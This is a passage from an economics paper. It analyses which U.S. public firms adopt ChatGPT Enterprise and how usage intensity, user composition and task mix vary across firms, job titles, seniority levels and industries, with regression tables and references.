Figure 2 provides descriptive statistics from a comparison of 2024 firm characteristics for ChatGPT Enterprise adopters and non-adopters in the Compustat public-company sample. Across all measures, adopters are substantially larger. Median revenue is $2,275.1M for adopters versus $209.6M for non-adopters. Median total assets are $4,394.2M versus $667.6M, and median employment is 2,934 workers versus 424 workers. Adopters also have larger capital stocks, greater market valuations, and greater R&D spending. Median net property, plant, and equipment (PP&E) assets are $271.2M for adopters compared with $43.7M for non-adopters. Median market value is $4,997.2M versus $316.4M, and the median research and development expenses are $113.1M among adopters, compared with $9.9M among non-adopters. These patterns indicate that early ChatGPT Enterprise adopters are not representative of the average public firm; they are larger, more capitalized, more valuable, and more R&D-intensive.

4.2.1 Financial characteristics

These unadjusted differences motivate the regression analysis in Table 1, which relates ChatGPT Enterprise adoption to lagged financial characteristics measured at the public firm-year level. Importantly, our estimates describe conditional associations between these pre-adoption firm characteristics and the probability that a public firm is observed as a ChatGPT Enterprise adopter, and should not be interpreted causally.

Across specifications, firms with higher revenue per employee are more likely to adopt ChatGPT Enterprise. A one-log-point increase in lagged revenue per employee is associated with roughly 0.4 to 0.9 percentage points higher adoption probability. This association remains positive and statistically significant after accounting for assets per employee, PP&E per employee, employment, year fixed effects, and industry fixed effects, indicating that it is not solely a difference between larger firms or more capital-intensive industries. Firm scale is also strongly associated with adoption: lagged log employment is positive and statistically significant in all specifications, including those with additional capital-intensity controls and finer NAICS4 industry fixed effects. By contrast, PP&E per employee is generally negatively associated with adoption conditional on scale and the other included financial characteristics. Thus, among otherwise comparable public firms, ChatGPT Enterprise adoption is less concentrated in firms with more physical-capital-intensive production. These patterns persist when excluding technology firms, indicating that they are not primarily driven by the information sector. In summary, ChatGPT Enterprise adoption is more likely among larger, higher revenue-per-worker public firms with relatively lower physical capital intensity.

4.2.2 Usage intensity among adopters

We next move from the extensive margin of adoption to the intensive margin, asking whether financial characteristics also vary with the level of ChatGPT Enterprise use among adopters. Figure 4 provides descriptive evidence by comparing the distribution of revenue per employee and market value per employee by adoption intensity, measured by weekly output tokens per employee. Panel A indexes each outcome to the non-adopter median. For both revenue per employee and market value per employee, high-intensity adopters are shifted to the right of non-adopters and low-intensity adopters. This indicates that, among public firms, the firms using ChatGPT Enterprise most intensively tend to have higher revenue productivity and higher market valuation per worker.

Panel B provides a covariate-adjusted version of this comparison, accounting for industry and firm size. This adjustment asks whether high-intensity adopters look different not only because they are in larger or more productive sectors, but also relative to observably similar firms in the same broad industry and size class. The rightward shift for high-intensity adopters remains visible, especially for market value per employee. Low-intensity adopters sit closer to non-adopters, while high-intensity adopters are more likely to appear in the upper part of the adjusted outcome distribution. Thus, the relationship between usage intensity and financial performance is not explained solely by firm size: conditional on adopting, more intensive ChatGPT Enterprise use is concentrated among firms with stronger per-employee financial outcomes.

Table 2 provides regression-based evidence, relating lagged financial characteristics to four measures of usage intensity among U.S.-based public-company adopters with positive ChatGPT Enterprise activity: messages per active usage week per employee, weekly active users per employee, output tokens per employee, and messages per weekly active user. Revenue per employee has positive but imprecisely estimated associations with some usage margins. The point estimates are positive for messages per active usage week per employee and weekly active users per employee, but neither coefficient is statistically significant; revenue per employee is not meaningfully associated with output tokens per employee or messages per active user once other controls are included. The pattern is consistent with broader diffusion across employees and active weeks, but the estimates are too imprecise to support a strong conclusion. Firm size has the opposite association with per-employee usage intensity: lagged log employment is negative and statistically significant for messages per active week per employee, weekly active users per employee, and output tokens per employee. This pattern is consistent with a mechanical or organizational scaling effect: larger firms are more likely to adopt, but conditional on adoption, measured use per employee is lower.

4.2.3 Firm scale and adoption

Although larger firms have lower measured usage per employee conditional on adoption, they are more likely to adopt ChatGPT Enterprise in the first place. We next ask whether adoption is especially concentrated among the largest public firms. Table 3 shows that a one-log-point increase in lagged revenue is associated with a 1.1 percentage point higher probability of adoption. This relationship is most pronounced at the top of the revenue distribution: firms in the top revenue quartile are 6.9 percentage points more likely to adopt, and firms in the top 5 percent are 9.8 percentage points more likely to adopt.

This pattern is not simply a consequence of large firms operating in large industries. When scale is measured relative to other firms in the same industry-year cell, following the approach in Autor et al. 2020, firms in the top revenue quartile within their NAICS2-by-year cell are 7.2 percentage points more likely to adopt, while firms in the top 5 percent are 11.3 percentage points more likely to adopt. Thus, even within industries, adoption is more common among the largest firms. Importantly, these estimates are limited to U.S.-based public companies, which are already large relative to the broader population of businesses. They therefore describe variation among relatively large firms and do not establish how ChatGPT Enterprise adoption varies among small private firms, startups, or mid-market firms; the relationship could be steeper, flatter, or nonlinear elsewhere in that part of the firm-size distribution.

4.2.4 Pre-existing complements and enterprise adoption

Firm scale is unlikely to be the only reason some public firms are more likely to adopt ChatGPT Enterprise. Larger firms may also have accumulated organizational, technical, and managerial capabilities that help them identify valuable use cases, redesign workflows, train workers, and integrate the tool into existing business processes. Table 4 therefore examines whether ChatGPT Enterprise adoption is associated with pre-existing investments in organizational and intangible capital.

We measure these complements using stocks of SG&A, R&D, and capitalized software per employee, transformed as log one plus the employee-normalized stock. The measures capture accumulated investment in organizational capabilities, innovation, and software infrastructure, respectively—forms of intangible capital that have been emphasized as complements to computing in the broader literature (e.g., Brynjolfsson et al. 2021). We use stocks rather than one-year spending flows to capture capacity built up before ChatGPT Enterprise adoption. The adoption regressions cover fiscal years 2024–2025, while all complement stocks are measured in fiscal year 2021. For SG&A and R&D, we construct stocks by cumulating historical Compustat spending flows using a perpetual-inventory approach: SG&A expense is depreciated at 20 percent annually and R&D expense at 15 percent annually. Capitalized software is measured directly using the Compustat capitalized-software stock. Each stock is converted to dollars and normalized by employment before entering the regressions.

The strongest and most robust association is with SG&A stock per employee. In the full sample, its coefficient is 0.020 and statistically significant; in the sample excluding technology and high-R&D sectors, it remains positive at 0.010, though it is not statistically significant. R&D stock per employee is also positively associated with adoption in both samples, with coefficients of 0.004 in the full sample and 0.003 in the sample excluding technology and high-R&D sectors. Capitalized software is positive and statistically significant in the full sample, with a coefficient of 0.008, but is positive and imprecisely estimated in the non-tech/high-R&D-excluded sample, with a coefficient of 0.006.

Taken together, the results suggest that ChatGPT Enterprise adoption is associated not only with firm scale, but also with the organizational and intangible assets firms have accumulated beforehand. Alongside the earlier findings—that adoption rises with revenue productivity and especially firm scale, and that more productive adopters tend to use ChatGPT Enterprise more broadly per employee—this pattern is consistent with the view that generative AI, like other general purpose technologies, depends on complementary capabilities within firms. Larger and more organizationally intensive firms may be better positioned both to identify valuable use cases and to deploy and integrate the technology into existing workflows.

4.3 Enterprise AI use is broadly distributed across worker groups but uneven in intensity

We next examine the subset of firms for which we observe high-quality job title information, as described in Section 3.2. We focus on job title classes and seniority levels and study two margins: the share of weekly active users in each category and usage intensity conditional on active use.

Two limitations of this approach are important for interpretation. First, job title coverage is not universal and varies across firms, so these estimates describe observed use within the covered job title sample rather than the full workforce of all adopting firms. Second, the composition of active users is not the same as a role-specific adoption rate, because we do not observe the denominator of all employees by role. Accordingly, the worker-composition results measure each category’s share of observed weekly active users; they do not measure the share of employees in that category who adopt ChatGPT Enterprise or whether the category is overrepresented among users relative to its workforce share. Similarly, the usage-intensity estimates compare activity among active users and do not account for differences across categories in the probability of becoming active.

4.3.1 The Extensive Margin of Use Across Job Title Class and Seniority

Figure 5 reports two ways of summarizing active-user composition six months after organizational adoption. The population-level estimate pools weekly active users across organizations, giving greater weight to firms with more active users. The firm-level estimate first calculates each category’s share within an organization and then averages those shares across organizations, giving each firm equal weight. The former describes the composition of observed active users in the sample as a whole, while the latter describes the composition of the average firm.

Panel A reports the distribution across job title classes. Both estimates show that observed active use extends across a range of organizational functions and is not confined to technical workers. At the average firm, engineering and technical practitioners account for approximately 11% of weekly active users after six months, while executives, founders, and partners account for 9%. Finance and accounting and marketing and communications each account for approximately 5%, and sales and account management accounts for approximately 4%. This broad functional distribution is consistent with ChatGPT being adopted across the organizational structure rather than within a single occupational domain.

Panel B reports the corresponding distribution across inferred seniority levels. At the average firm, managers and directors account for approximately 24% of weekly active users after six months, followed by individual contributors (ICs) and professionals at 15% and senior ICs and principals at 14%. Executives account for approximately 10%, while early-career workers and trainees account for 7%. The seniority distribution similarly shows that ChatGPT Enterprise use spans multiple levels of the organizational hierarchy, rather than being concentrated among either junior employees or senior leadership.

4.3.2 The Intensive Margin of Use Across Job Title Class and Seniority

Figure 6 reports differences in weekly ChatGPT Enterprise usage intensity across worker categories, measured as the difference in weekly messages per active user from the relevant baseline. Panel A reports differences by job title class, while Panel B reports differences by inferred seniority level. In each panel, the specifications without firm fixed effects compare each group to the average active user in the sample, while the firm fixed effects specifications absorb differences in average usage intensity across firms and compare workers to other active users within the same organization.

Panel A of Figure 6 reports variation in weekly messages per active user by job title class among active users. The results show that job title classes that account for larger shares of observed weekly active users are not necessarily those with the highest usage intensity conditional on active use. In particular, analysts and marketing and communications workers send more weekly messages than the average active user in their firms, even though they do not account for the largest shares of observed weekly active users (Figure 5, Panel A). By contrast, executives, founders, and partners send fewer messages than other active users within the same firm. These patterns indicate that active-user composition and usage intensity capture distinct dimensions of enterprise adoption.

Panel B of Figure 6 reports usage intensity by inferred seniority level. The clearest pattern is a strong negative seniority gradient in message volume. Among adopters, early-career workers and trainees send roughly eight to nine more weekly messages than the average active user within the same firm, while managers, directors, and executives send fewer messages. This pattern is especially relevant in light of recent evidence on generative AI and early-career labor-market outcomes (e.g. Brynjolfsson et al. 2025a), because it identifies early-career workers as particularly intensive users conditional on active use. At the same time, message volume should be interpreted as a measure of usage intensity rather than as a complete measure of economic importance.

Overall, high-intensity use appears both in specific functional groups, such as analysts and marketing and communications workers, and at particular points in the career hierarchy, especially among early-career workers and trainees. This heterogeneity motivates the task-level analysis below, which examines whether these differences in usage intensity correspond to differences in the kinds of work for which employees use ChatGPT.

4.4 Enterprise AI use spans a broad set of knowledge work tasks within organizations

We now turn from who uses ChatGPT Enterprise to what kinds of work they use it for. We classify Enterprise messages into a task taxonomy using an automated classifier described in Appendix D and summarize task composition using two complementary measures. The first is the share of weekly active users who perform a task at least once during the week. This task-prevalence measure captures the breadth of exposure to each task category. Because users may perform multiple task types in the same week, the category shares are not mutually exclusive and therefore do not sum to one. The second is the share of weekly messages assigned to each task category. This message-share measure captures the intensity of use by task and shows which activities account for the largest share of observed interaction with ChatGPT Enterprise.

4.4.1 Overall Enterprise Task Composition

Figure 7 reports the overall task composition of ChatGPT Enterprise use. Panel A shows that more than half of active users perform documentation or technical-writing tasks, nearly half perform technical digital work, and large shares use ChatGPT Enterprise for messages, topic overviews, facts and figures, professional work, research, sales and marketing, planning, legal work, data analysis, and financial or tax tasks. The central pattern is not the dominance of a single application, but the breadth of task exposure among active users.

Panel B shows that message volume is more concentrated than task incidence. Documentation and technical writing, technical digital work, and message drafting account for large shares of total messages, while several categories that reach many users account for relatively small shares of message volume. Topic overviews, business and market research, legal and regulatory work, and financial and tax tasks are widespread but comparatively less message-intensive. This distinction matters for interpreting enterprise AI use. A task can be economically relevant because it reaches many workers, because it accounts for large amounts of usage, or both. User reach and usage depth are therefore separate margins of task-level diffusion. Panel B also shows a substantial residual category of other task classifications. This is useful evidence in itself, in that it indicates that ChatGPT Enterprise use has a long tail: workers apply the tool to many activities that do not fit cleanly into the largest task categories.

4.4.2 Task Differences Across Industries

Figure 8 examines task composition by two-digit NAICS sector (referred to hereafter as “industry”), separately for task prevalence and message shares. Panel A reports the share of weekly active users in each industry who use ChatGPT Enterprise for a given task at least once, while Panel B reports the share of weekly messages in each industry assigned to each task.

Panel A shows both commonality and industry variation. The broad task structure is similar across industries: documentation and technical writing, technical digital work, and communication are among the most common tasks in every major industry group. At the same time, task prevalence varies in ways that are consistent with differences in the underlying task content of work across industries. For example, financial and tax-related tasks are substantially more prevalent in finance and insurance than in other industries, business and market research is also especially common in finance and insurance, and sales and marketing tasks are more prevalent in arts, entertainment, and recreation, information, and retail trade than in manufacturing. Panel B shows that these industry differences are more muted when tasks are weighted by message volume. Across industries, messages are concentrated in a similar set of categories, especially documentation and technical writing, technical digital work, and communication. In other words, industry differences appear more strongly on the extensive task margin, i.e., which tasks active users try at least once, than on the intensive task margin, i.e., which tasks account for the largest shares of total messages.

4.4.3 Task Differences by Job Title Class and Seniority

Figures 9 and 10 examine task composition by job title class and inferred seniority, respectively. As above, Panel A in each figure reports the share of active users in each group who use ChatGPT Enterprise for a task at least once during the week, while Panel B reports the share of messages assigned to each task.

Figure 9 shows both broad commonality and role-specific specialization. Documentation and technical writing, communication, and technical or digital tasks appear across many job title classes. At the same time, task prevalence varies in ways that align with job responsibilities: engineering and technical practitioners are especially likely to use ChatGPT Enterprise for technical digital work and debugging, finance and accounting workers for financial and tax tasks, and sales, account, marketing, and communications roles for sales and marketing tasks. The message-share panel shows a related pattern, but also makes clear that these role-specific tasks do not overpower the small set of core tasks that are performed by all roles.

Figure 10 shows a similar structure across the organizational hierarchy. Workers at different seniority levels use overlapping task categories, but with different relative emphasis. Early-career workers, individual contributors, managers, and executives all use ChatGPT Enterprise for common categories such as documentation and technical writing, technical digital work, communication, and information-oriented tasks. At the same time, seniority is associated with differences in the breadth and mix of task use. For instance, early-career workers and individual contributors have high prevalence in several common production-oriented categories, whereas executives are relatively more represented in categories such as topic overviews, facts and figures, legal and regulatory work, and financial or tax-related tasks.

5 Conclusion

A growing literature argues that AI, and especially large language models, have the characteristics of a general purpose technology (Goldfarb et al. 2023; Eloundou et al. 2024). For such technologies to affect production, firms must do more than obtain access: they must discover valuable use cases, encourage use across workers, and integrate the technology into existing workflows. This paper studies that process using administrative data from ChatGPT Enterprise. One central message is that access to the same underlying system does not imply uniform use: firms differ in whether and when they adopt, workers differ in how intensively they use the tool, and task use varies across industries, job title classes, and seniority levels.

This interpretation has several implications. First, the earliest U.S.-based public company adopters are not average firms; they are larger, more intangible-intensive, and more highly valued. The relationship between adoption and firm capabilities also points toward the importance of complements. Firms with greater scale and accumulated intangible investments may be better positioned to identify valuable applications, support workers in using the technology, and integrate it into business processes. Second, diffusion may initially reinforce existing firm heterogeneity. If larger and more intangible-intensive firms adopt earlier and are better positioned to integrate the technology into work, generative AI could widen differences in productivity or value creation across firms even when the underlying models are broadly available. Third, adopting firms differ substantially in the breadth of participation, the intensity of use, and the task mix to which the technology is applied. These margins matter because the economic role of generative AI depends not only on whether a firm has access, but also on where the technology enters the organization of work.

Importantly, these results should be interpreted in light of the scope of the data. The analyses measure usage only within OpenAI’s ChatGPT Enterprise product, not usage of other AI systems, API-based tools, internally built applications, or personal accounts. The worker-level results are based on observed administrative job titles, which are incomplete and do not provide denominators for the full workforce in each role. The task results are based on classified message content and do not measure downstream work products, productivity effects, or changes in organizational routines. Finally, the public company analyses are limited to the selected subset of U.S.-based enterprise organizations that can be linked to financial data. Future work should connect enterprise AI telemetry to measures of output, organizational change, and longer-run firm performance, and should examine how adoption, usage intensity, worker composition, and task mix evolve as generative AI continues to become more widespread.

Even with these limitations, the patterns documented in this paper point to a central feature of enterprise AI diffusion: adoption is only the beginning of deployment. The rapid adoption of generative AI by firms should therefore not be equated with immediate productivity transformation. General purpose technologies rarely generate immediate, economy-wide gains; their impact unfolds through a slower process of co-invention in which firms discover use cases, invest in complements, and reorganize production so that a new capability becomes reliable in everyday work (Griliches 1957; Mansfield 1961; Hall and Khan 2003; Jovanovic and Rousseau 2005; Bresnahan and Trajtenberg 1995). We are still in the early stages of that process. Firms are not merely deciding whether to use generative AI; they are learning where it belongs in their organizational workflow. The economic effects of generative AI will depend on how that learning and decision-making process unfolds across firms, workers, and tasks.

Tables

Table 1: Financial Characteristics and Enterprise Adoption

(1) (2) (3) (4)
DV Adopter Adopter Adopter Adopter
Controls Base. Addl. Addl. Addl.
Sample All All All No tech
L. log rev./emp. 0.009*** 0.006*** 0.004* 0.005**
(0.002) (0.002) (0.002) (0.002)
L. log assets/emp. 0.010*** 0.013*** 0.009***
(0.003) (0.003) (0.003)
L. log PP&E/emp. -0.007*** -0.001 -0.007***
(0.002) (0.002) (0.002)
L. log emp. 0.013*** 0.015*** 0.019*** 0.013***
(0.001) (0.001) (0.001) (0.001)
Obs. 8,229 8,229 8,229 7,379
R2 0.053 0.055 0.109 0.046
FYs 2024-2025 2024-2025 2024-2025 2024-2025
Year FE Yes Yes Yes Yes
Ind. FE NAICS2 NAICS2 NAICS4 NAICS2

Each column reports a linear probability model estimated on public firm-years with positive lagged employment and positive lagged firm-characteristic values. The dependent variable equals one when a public firm’s first OpenAI Enterprise adoption date falls in the current fiscal year; controls are public firm-years not linked through the OpenAI ticker bridge. The table reports the industry fixed-effect level used in each column. Baseline columns control for lagged log employment. Additional-control columns additionally control for lagged log assets per employee, lagged log positive PP&E per employee, and indicators for no positive and missing lagged PP&E; the indicator coefficients are included in the model but omitted from the table. The no-tech column excludes firms with two-digit NAICS code 51. Standard errors clustered by Compustat gvkey are in parentheses. *, **, and *** indicate significance at the 10%, 5%, and 1% levels.

Table 2: Financial Characteristics and Usage Intensity

(1) (2) (3) (4)
DV Msgs/act. wk/emp WAU/emp Tokens/emp Msgs/WAU
L. log rev./emp. 0.062 0.006 0.036 -0.014
(0.044) (0.007) (0.094) (0.021)
L. log assets/emp. 0.061 0.012* 0.107 0.008
(0.045) (0.008) (0.099) (0.019)
L. log PP&E/emp. -0.079** -0.010* -0.087 -0.018
(0.033) (0.006) (0.070) (0.014)
L. log emp. -0.266*** -0.032*** -0.667*** -0.002
(0.019) (0.003) (0.048) (0.008)
Obs. 478 478 396 482
R2 0.480 0.362 0.471 0.100
FYs 2024-2025 2024-2025 2024-2025 2024-2025
Year FE Yes Yes Yes Yes
Ind. FE NAICS2 NAICS2 NAICS2 NAICS2

Each column reports an OLS regression of transformed current fiscal-year Enterprise usage intensity on lagged public-company financial characteristics, estimated on public tickers with positive fiscal-year Enterprise usage, positive lagged employment, and positive lagged firm-characteristic values. Dependent variables are transformed as log one plus usage intensity. Msgs/act. wk/emp is messages per active usage week per employee; WAU/emp is mean weekly active users per employee; Tokens/emp is mean weekly output tokens per employee; Msgs/WAU is messages per weekly active user. Output-token usage is measured over weeks with complete output-token coverage. All columns control for lagged log employment, lagged log assets per employee, lagged log positive PP&E per employee, and indicators for no positive and missing lagged PP&E; the indicator coefficients are included in the model but omitted from the table. Standard errors clustered by Compustat gvkey are in parentheses. *, **, and *** indicate significance at the 10%, 5%, and 1% levels.

Table 3: Firm Scale and Enterprise Adoption

(1) (2) (3) (4) (5)
DV Adopter Adopter Adopter Adopter Adopter
Scale Revenue Revenue Revenue Ind.-yr rev. Ind.-yr rev.
L. log revenue 0.011***
Top 25% by L. rev. 0.069***
Top 5% by L. rev. 0.098***
Top 25% by L. rev., ind.-yr 0.072***
Top 5% by L. rev., ind.-yr 0.113***
Obs. 9,391 9,391 9,391 9,391 9,391
R2 0.051 0.046 0.035 0.048 0.040
FYs 2024-2025 2024-2025 2024-2025 2024-2025 2024-2025
Year FE Yes Yes Yes Yes Yes
Ind. FE NAICS2 NAICS2 NAICS2 NAICS2 NAICS2

Each column reports a linear probability model estimated on public firm-years with positive lagged scale values. The dependent variable equals one when a public firm’s first OpenAI Enterprise adoption date falls in the current fiscal year; controls are public firm-years not linked through the OpenAI ticker bridge. Column 1 uses lagged log revenue. Columns 2–5 use indicators for being in the top tail of lagged revenue, computed within fiscal year using lagged total revenue; industry-year indicators are computed within fiscal-year and two-digit NAICS cells. All columns include fiscal-year and two-digit NAICS industry fixed effects. Standard errors clustered by Compustat gvkey are in parentheses. *, **, and *** indicate significance at the 10%, 5%, and 1% levels.

Table 4: Intangible Assets and Enterprise Adoption

(1) (2) (3) (4) (5) (6)
Dependent variable Adopter Adopter Adopter Adopter Adopter Adopter
Complement measure SG&A stock R&D stock Capitalized software SG&A stock R&D stock Capitalized software
Sample All All All No tech/high R&D No tech/high R&D No tech/high R&D
Log(1 + comp./emp.) 0.020*** 0.004*** 0.008** 0.010 0.003*** 0.006
(0.005) (0.001) (0.003) (0.007) (0.001) (0.006)
L. log revenue/emp. 0.006** 0.008*** 0.012 0.010 0.019*** 0.021
(0.003) (0.002) (0.009) (0.007) (0.006) (0.019)
L. log assets/emp. 0.004 0.010*** 0.020 0.002 -0.001 0.005
(0.004) (0.003) (0.012) (0.007) (0.006) (0.020)
L. log PP&E/emp. -0.005** -0.005** -0.017** -0.005 -0.005* -0.010
(0.002) (0.002) (0.008) (0.003) (0.003) (0.012)
L. log employment 0.020*** 0.015*** 0.017*** 0.017*** 0.015*** 0.023***
(0.002) (0.001) (0.004) (0.002) (0.002) (0.007)
Observations 5,943 7,117 1,076 3,247 4,029 477
R2 0.064 0.058 0.075 0.055 0.057 0.085
Year FE Yes Yes Yes Yes Yes Yes
Ind. FE NAICS2 NAICS2 NAICS2 NAICS2 NAICS2 NAICS2

Each column reports a linear probability model estimated on public firm-years with positive employment and finite nonnegative complement stock per employee. The dependent variable equals one when a public firm’s first ChatGPT Enterprise adoption date falls in the current fiscal year; controls are public firm-years not linked through the OpenAI ticker bridge. Entries report coefficients from regressions of adoption on log one plus complement stock per employee, lagged log revenue per employee, lagged log employment, lagged log assets per employee, lagged log positive PP&E per employee, indicators for no positive and missing lagged PP&E, fiscal-year fixed effects, and two-digit NAICS industry fixed effects. The no-tech/high-R&D columns exclude NAICS2 sectors 32, 33, 51; high-R&D sectors are selected using fiscal-year 2021 sector median R&D stock per employee. Fiscal years: 2024-2025. Complement variables are measured in fiscal year 2021. SG&A and R&D stocks are accumulated from Compustat flow variables: SG&A uses xsga with 20% annual depreciation, and R&D uses xrd with 15% annual depreciation. Capitalized software uses the Compustat capsft level joined from the capitalized-software extract. Complement values are converted to dollars, divided by employees, and transformed as log one plus the employee-normalized value before entering the model. Complement-stock opening stock: zero-growth steady-state opening stock. Missing SG&A and negative flows are left missing; missing R&D and observed zero flows are treated as zero investment. Standard errors clustered by Compustat gvkey are in parentheses. *, **, and *** indicate significance at the 10%, 5%, and 1% levels.

References

Appel, R., Massenkoff, M., McCrory, P., McCain, M., Heller, R., Neylon, T., and Tamkin, A. (Jan. 2026). Anthropic Economic Index Report: Economic Primitives. Anthropic research report. https://www.anthropic.com/research/anthropic-economic-index-january-2026-report.

Appel, R., McCrory, P., Tamkin, A., Stern, M., McCain, M., and Neylon, T. (Sept. 2025). Anthropic Economic Index Report: Uneven Geographic and Enterprise AI Adoption. Anthropic research report. https://www.anthropic.com/research/anthropic-economic-index-september-2025-report.

Autor, D., Dorn, D., Katz, L. F., Patterson, C., and Van Reenen, J. (2020). “The Fall of the Labor Share and the Rise of Superstar Firms”. The Quarterly Journal of Economics 135.2, pp. 645–709. doi: 10.1093/qje/qjaa004.

Autor, D. H. and Thompson, N. (June 2025). Expertise. NBER Working Paper 33941. National Bureau of Economic Research. doi: 10.3386/w33941. https://www.nber.org/papers/w33941.

Babina, T., Fedyk, A., He, A., and Hodson, J. (2024). “Artificial Intelligence, Firm Growth, and Product Innovation”. Journal of Financial Economics 151, p. 103745. doi: 10.1016/j.jfineco.2023.103745.

Bick, A., Blandin, A., and Deming, D. J. (2026a). “The Rapid Adoption of Generative AI”. Management Science. Published online January 20, 2026. doi: 10.1287/mnsc.2025.02523.

Bick, A., Blandin, A., Deming, D. J., Fuchs-Schündeln, N., and Jessen, J. (Mar. 2026b). Mind the Gap: AI Adoption in Europe and the U.S. NBER Working Paper 34995. National Bureau of Economic Research. doi: 10.3386/w34995. https://www.nber.org/papers/w34995.

Bloom, N., Garicano, L., Sadun, R., and Van Reenen, J. (2014). “The Distinct Effects of Information Technology and Communication Technology on Firm Organization”. Management Science 60.12, pp. 2859–2885. doi: 10.1287/mnsc.2014.2013.

Bonney, K., Breaux, C. L., Dinlersoz, E., Foster, L. S., Haltiwanger, J. C., and Pande, A. A. (2026). The Microstructure of AI Diffusion: Evidence from Firms, Business Functions, and Worker Tasks. NBER Working Paper 35141. National Bureau of Economic Research. doi: 10.3386/w35141. https://www.nber.org/papers/w35141.

Brand, J. M., Demirer, M., Finucane, C., and Kreps, A. A. (2024). “Firm Productivity and Learning with Digital Technologies: Evidence from Cloud Computing”. NBER Working Paper 32938. Revised December 2025. National Bureau of Economic Research. doi: 10.3386/w32938. https://www.nber.org/papers/w32938.

Bresnahan, T. and Greenstein, S. (1996). “Technical progress and co-invention in computing and in the uses of computers”. Brookings Papers on Economic Activity. Microeconomics, pp. 1–83.

Bresnahan, T. F. (2024). “What Innovation Paths for AI to Become a GPT?” Journal of Economics & Management Strategy 33.2, pp. 305–316. doi: 10.1111/jems.12524.

Bresnahan, T. F., Brynjolfsson, E., and Hitt, L. M. (2002). “Information Technology, Workplace Organization, and the Demand for Skilled Labor: Firm-Level Evidence”. Quarterly Journal of Economics 117.1, pp. 339–376. doi: 10.1162/003355302753399526.

Bresnahan, T. F. and Trajtenberg, M. (1995). “General Purpose Technologies: ‘Engines of Growth?’” Journal of Econometrics 65.1, pp. 83–108. doi: 10.1016/0304-4076(94)01598-T.

Brynjolfsson, E., Chandar, B., and Chen, R. (2025a). “Canaries in the Coal Mine?: Six Facts about the Recent Employment Effects of Artificial Intelligence”.

Brynjolfsson, E., Li, D., and Raymond, L. R. (2025b). “Generative AI at Work”. Quarterly Journal of Economics 140.2, pp. 889–942. doi: 10.1093/qje/qjae044.

Brynjolfsson, E., Rock, D., and Syverson, C. (2021). “The Productivity J-Curve: How Intangibles Complement General Purpose Technologies”. American Economic Journal: Macroeconomics 13.1, pp. 333–372. doi: 10.1257/mac.20180386.

Chatterji, A., Cunningham, T., Deming, D. J., Hitzig, Z., Ong, C., Shan, C. Y., and Wadman, K. (Sept. 2025). How People Use ChatGPT. NBER Working Paper 34255. National Bureau of Economic Research. doi: 10.3386/w34255. https://www.nber.org/papers/w34255.

Chen, F. and Stratton, J. (2026). “Artificial Intelligence in the Firm”. Working paper. https://fion.ac/jellyfish.pdf.

Counts, S., Chen, Y., Dong, J., Sharma, H., Zaikin, A., Hu, R., Kok, A., Yilmaz, G. O., Suri, S., Tomlinson, K., et al. (2026). “AI in the Enterprise: How People Use M365 Copilot Chat”. arXiv preprint arXiv:2605.23958.

Cui, K. Z., Demirer, M., Jaffe, S., Musolff, L., Peng, S., and Salz, T. (2026). “The Effects of Generative AI on High-Skilled Work: Evidence from Three Field Experiments with Software Developers”. Management Science. Published online February 27, 2026. doi: 10.1287/mnsc.2025.00535.

Daniotti, S., Wachs, J., Feng, X., and Neffke, F. (2026). “Who Is Using AI to Code? Global Diffusion and Impact of Generative AI”. Science 391.6787, pp. 831–835. doi: 10.1126/science.adz9311.

Dell’Acqua, F., McFowland III, E., Mollick, E., Lifshitz-Assaf, H., Kellogg, K. C., Rajendran, S., Krayer, L., Candelon, F., and Lakhani, K. R. (2026). “Navigating the Jagged Technological Frontier: Field Experimental Evidence of the Effects of Artificial Intelligence on Knowledge Worker Productivity and Quality”. Organization Science 37.2, pp. 403–423. doi: 10.1287/orsc.2025.21838.

Demirer, M., Fradkin, A., Tadelis, N., and Peng, S. (Dec. 2025). The Emerging Market for Intelligence: Pricing, Supply, and Demand for LLMs. NBER Working Paper 34608. National Bureau of Economic Research. doi: 10.3386/w34608. https://www.nber.org/papers/w34608.

Demirer, M., Horton, J. J., Immorlica, N., Lucier, B., and Shahidi, P. (Feb. 2026a). Chaining Tasks, Redefining Work: A Theory of AI Automation. NBER Working Paper 34859. National Bureau of Economic Research. doi: 10.3386/w34859. https://www.nber.org/papers/w34859.

Demirer, M., Musolff, L., and Yang, L. (May 2026b). Writing Code vs. Shipping Code: Productivity Effects Across Generations of AI Coding Tools. NBER Working Paper 35275. National Bureau of Economic Research. doi: 10.3386/w35275. https://www.nber.org/papers/w35275.

Eisfeldt, A. L., Schubert, G., Taska, B., and Zhang, M. B. (2026). “Generative AI and Firm Values”. Journal of Finance. Forthcoming. https://artificialminushuman.com/.

Eloundou, T., Manning, S., Mishkin, P., and Rock, D. (2024). “GPTs are GPTs: Labor market impact potential of LLMs”. Science 384.6702, pp. 1306–1308.

Fradkin, A. (2025). Demand for LLMs: Descriptive Evidence on Substitution, Market Expansion, and Multihoming. doi: 10.48550/arXiv.2504.15440. arXiv: 2504.15440. https://arxiv.org/abs/2504.15440.

Fuentelsaz, L., Gómez, J., and Polo, Y. (2003). “Intrafirm Diffusion of New Technologies: An Empirical Application”. Research Policy 32.4, pp. 533–551. doi: 10.1016/S0048-7333(02)00081-1.

Garicano, L. (2000). “Hierarchies and the Organization of Knowledge in Production”. Journal of Political Economy 108.5, pp. 874–904. doi: 10.1086/317671.

Garicano, L. and Rossi-Hansberg, E. (2006). “Organization and Inequality in a Knowledge Economy”. Quarterly Journal of Economics 121.4, pp. 1383–1435. doi: 10.1093/qje/121.4.1383.

Goldfarb, A., Taska, B., and Teodoridis, F. (2023). “Could machine learning be a general purpose technology? A comparison of emerging technologies using data from online job postings”. Research Policy 52.1, p. 104653.

Griliches, Z. (1957). “Hybrid corn: An exploration in the economics of technological change”. Econometrica 25.4, pp. 501–522.

Hall, B. H. and Khan, B. (2003). Adoption of new technology. Tech. rep. w9730. National Bureau of Economic Research.

Handa, K., Tamkin, A., McCain, M., Huang, S., Durmus, E., Heck, S., Mueller, J., Hong, J., Ritchie, S., Belonax, T., Troy, K. K., Amodei, D., Kaplan, J., Clark, J., and Ganguli, D. (2025). Which Economic Tasks Are Performed with AI? Evidence from Millions of Claude Conversations. doi: 10.48550/arXiv.2503.04761. arXiv: 2503.04761. https://arxiv.org/abs/2503.04761.

Huang, S., Seethor, B., Durmus, E., Handa, K., McCain, M., Stern, M., and Ganguli, D. (Dec. 2025). How AI Is Transforming Work at Anthropic. Anthropic research report. https://www.anthropic.com/research/how-ai-is-transforming-work-at-anthropic.

